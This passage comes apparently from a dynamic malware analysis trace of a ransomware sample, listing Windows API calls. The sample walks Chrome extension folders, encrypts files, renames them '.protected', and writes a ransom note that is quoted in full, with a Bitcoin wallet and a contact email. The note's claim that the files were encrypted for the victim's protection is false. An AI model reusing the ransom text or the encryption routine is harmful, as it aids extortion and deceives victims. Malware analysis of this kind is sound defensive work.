lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\.") returned 147 [0081.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.070] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") 
returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\..") returned 148 [0081.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.070] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.070] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.070] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.071] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.072] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.072] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.072] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c6, lpOverlapped=0x0) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.073] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c6, 
lpOverlapped=0x0) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.073] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.074] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.074] CloseHandle (hObject=0x168) returned 1 [0081.074] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected") returned 169 [0081.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected")) returned 1 [0081.075] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.075] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) 
returned 1 [0081.075] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\RESTORE_FILES.txt") returned 163 [0081.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.076] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.076] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.076] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.077] CloseHandle (hObject=0x164) returned 1 [0081.077] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0081.077] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0081.077] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id") returned 145 [0081.077] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0081.077] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0081.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*") returned 147 [0081.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\.") returned 147 [0081.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.078] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.078] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\..") returned 148 [0081.078] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.078] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.078] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.078] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.078] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.078] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.078] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] 
StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.079] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.082] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.083] CloseHandle (hObject=0x168) returned 1 [0081.083] wnsprintfW (in: pszDest=0xd11128, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected") returned 169 [0081.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected")) returned 1 [0081.084] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.084] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.084] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\RESTORE_FILES.txt") returned 163 [0081.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.086] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.087] lstrlenA (lpString="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") returned 684 [0081.087] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, 
nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.087] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.087] CloseHandle (hObject=0x164) returned 1 [0081.087] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0081.087] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0081.087] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it") returned 145 [0081.087] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0081.087] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0081.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*") returned 147 [0081.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\.") returned 147 [0081.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.088] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\..") returned 148 [0081.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.088] 